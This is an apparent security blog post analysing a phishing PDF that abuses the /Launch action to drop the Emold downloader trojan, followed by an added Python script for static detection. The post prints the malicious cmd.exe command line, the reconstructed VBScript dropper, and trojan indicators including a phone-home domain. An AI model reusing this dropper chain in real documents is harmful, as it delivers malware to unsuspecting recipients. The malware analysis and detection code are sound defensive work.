
Your Malware Settings May Have Changed

By: Nick Chapman

Last night and this morning, a number of people received an email that looks like this:

From: notifications@yyybank.com
Sent: Tuesday, April 27, 2010 7:47 AM
To: xxx@yyyybank.com
Subject: setting for your mailbox are changed

SMTP and POP3 servers for xxx@yyybank.com mailbox are changed.
Please carefully read the attached instructions before updating settings.

The message carries an attachment named "doc.pdf". That file was, of course, malicious in nature: it uses the PDF /Launch vulnerability to echo commands into a script file and then run the Emold downloader trojan. Let's take a look at the code.

8 0 obj
<< /Type /Action
/S /Launch
/F (cmd.exe)
/P (/c echo Set fso=CreateObject("Scripting.FileSystemObject") > script.vbs && echo Set f=fso.OpenTextFile("doc.pdf", 1, True) >> script.vbs && echo pf=f.ReadAll >> script.vbs && echo s=InStr(pf,"'SS") >> script.vbs && echo e=InStr(pf,"'EE") >> script.vbs && echo s=Mid(pf,s,e-s) >> script.vbs && echo Set z=fso.OpenTextFile("batscript.vbs", 2, True) >> script.vbs && echo s = Replace(s,"%","") >> script.vbs && echo z.Write(s) >> script.vbs && script.vbs && batscript.vbs)
>>
endobj

This Launch action hands cmd.exe a command line that echoes one VBScript statement at a time into a file called script.vbs, then runs script.vbs followed by batscript.vbs.
Once all of the echo statements have run, script.vbs ends up as:

Set fso=CreateObject("Scripting.FileSystemObject")
Set f=fso.OpenTextFile("doc.pdf", 1, True)
pf=f.ReadAll
s=InStr(pf,"'SS")
e=InStr(pf,"'EE")
s=Mid(pf,s,e-s)
Set z=fso.OpenTextFile("batscript.vbs", 2, True)
s = Replace(s,"%","")
z.Write(s)

When script.vbs runs, it opens doc.pdf and searches for the SS and EE tags that mark the beginning and end of a section of the PDF. It extracts that section, strips the leading % characters (which hide the lines from a PDF reader, since % starts a comment in PDF syntax), and writes the result to batscript.vbs.

Next, let's look at what's in the tagged section of doc.pdf that ends up in batscript.vbs:

5 0 obj
<< /Length 46 >>
/F1 34 Tf
50 500 Td
(Important Information

%Dim b
%Function c(d)
%End Function
"this line is 248413 characters long"
"c(000),c(000),c(000),c(000 ),"")
%Set fso = CreateObject("Scripting.FileSystemObject")
%Set f = fso.OpenTextFile("game.exe", 2, True)
%For i = 0 To 35328
%Set WshShell = WScript.CreateObject("WScript.Shell")
%WshShell.Run "cmd.exe /c game.exe"
%WScript.Sleep 3000
%Set f = FSO.GetFile("game.exe")
%Set f = FSO.GetFile("batscript.vbs")
%Set f = FSO.GetFile("script.vbs")

The array stored in b is an obfuscated executable; the For loop writes it out as game.exe. After running game.exe, this script (now executing as batscript.vbs) cleans up after itself by deleting game.exe, batscript.vbs, and script.vbs.
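The two tricks just described, a /Launch action that hands cmd.exe a command line and a payload hidden as PDF comment lines between SS and EE tags, are both easy to check for statically. The script below is an added example, not code from the blog or from the sample: it walks the PDF dictionaries (skipping over literal strings, because the real /P string itself contains ">> script.vbs" and a naive "<<...>>" regex would stop there), reports any /S /Launch action with its /F and /P values, and recovers the %-commented lines between the markers without executing anything. The sample PDF is constructed for the example with placeholder script lines, and the exact marker spelling ('SS / 'EE) is an assumption.

```python
"""Static triage for the pattern above: a /Launch action that hands a command
line to cmd.exe, and script lines hidden as PDF '%' comments between markers.
Added example, not the blog's code; nothing here executes any of it."""
import re

# Constructed sample modelled on the objects above; /P deliberately contains
# ">> script.vbs" as the real one did. Hidden lines are placeholders; 'SS/'EE spelling is assumed.
SAMPLE_PDF = b"""%PDF-1.4
8 0 obj
<< /Type /Action /S /Launch /F (cmd.exe)
/P (/c echo Set fso=CreateObject("Scripting.FileSystemObject") > script.vbs && echo z.Write(s) >> script.vbs && script.vbs) >>
endobj
5 0 obj
<< /Length 46 >>
stream
(Important Information) Tj
%'SS
%Dim b
%Set WshShell = WScript.CreateObject("WScript.Shell")
%WshShell.Run "cmd.exe /c game.exe"
%'EE
endstream
endobj
"""
WSH_KEYWORDS = ("wscript", "createobject", "filesystemobject", "cmd.exe", ".run ")


def _skip_string(data, i):
    """Index just past the literal string at data[i] == b'(' (escapes, nesting)."""
    depth = 0
    while i < len(data):
        c = data[i:i + 1]
        if c == b"\\":
            i += 2  # escaped byte: skip it whatever it is
            continue
        depth += (c == b"(") - (c == b")")
        if depth == 0:
            return i + 1
        i += 1
    return i


def find_dictionaries(data):
    """Yield each top-level << ... >> dictionary. Literal strings are skipped,
    so a '>>' inside /P (...) does not end the dictionary early."""
    i = 0
    while (start := data.find(b"<<", i)) >= 0:
        depth, j = 0, start
        while j < len(data):
            if data.startswith(b"<<", j):
                depth, j = depth + 1, j + 2
            elif data.startswith(b">>", j):
                depth, j = depth - 1, j + 2
                if depth == 0:
                    break
            elif data[j:j + 1] == b"(":
                j = _skip_string(data, j)
            else:
                j += 1
        yield data[start:j]
        i = j


def _string_value(d, key):
    """Contents of '/key (...)' inside dictionary d, or b'' if absent."""
    m = re.search(rb"/" + key + rb"\s*\(", d)
    return d[m.end():_skip_string(d, m.end() - 1) - 1] if m else b""


def find_launch_actions(data):
    """(/F target, /P parameters) for every /S /Launch action dictionary."""
    return [(_string_value(d, b"F"), _string_value(d, b"P"))
            for d in find_dictionaries(data) if re.search(rb"/S\s*/Launch\b", d)]


def extract_commented_script(data, start=b"'SS", end=b"'EE"):
    """Lines hidden as '%' comments between the markers: the text the dropper's
    Replace(s,"%","") step rebuilds, recovered here without running it."""
    s, e = data.find(start), data.find(end)
    if s < 0 or e <= s:
        return []
    lines = [raw.strip() for raw in data[s:e].splitlines()]
    return [l[1:].decode("latin-1") for l in lines if l.startswith(b"%") and len(l) > 1]


def triage(data):
    """Combine both checks into one verdict for a PDF's raw bytes."""
    launches = find_launch_actions(data)
    hidden = extract_commented_script(data)
    hits = [l for l in hidden if any(k in l.lower() for k in WSH_KEYWORDS)]
    return {"launch_actions": launches, "hidden_script_lines": hidden,
            "wsh_indicators": hits,
            "verdict": "suspicious" if launches or hits else "clean"}


if __name__ == "__main__":
    r = triage(SAMPLE_PDF)
    print(r["verdict"], r["launch_actions"][0][0], r["wsh_indicators"])
```

Run against a real file with `triage(open(path, "rb").read())`. A /Launch action alone is enough to flag a document for review; the keyword pass on the recovered comment lines is only there to cut noise from PDFs that legitimately carry % comments in their streams.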

Game.exe is the Emold trojan. Emold is a generic downloader that can be used to install any number of second-stage trojans. It can be identified by the presence of the file C:\Program Files\Microsoft Common\svchost.exe, by the registry key Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\explorer.exe, and by the fact that it (currently) phones home to jademason.com.

Adobe has stated that the Launch functionality is a feature, not a bug. Adobe is looking into the issue, but has not said what action, if any, it intends to take to mitigate the danger. Their post on the issue does include directions for turning this functionality off.
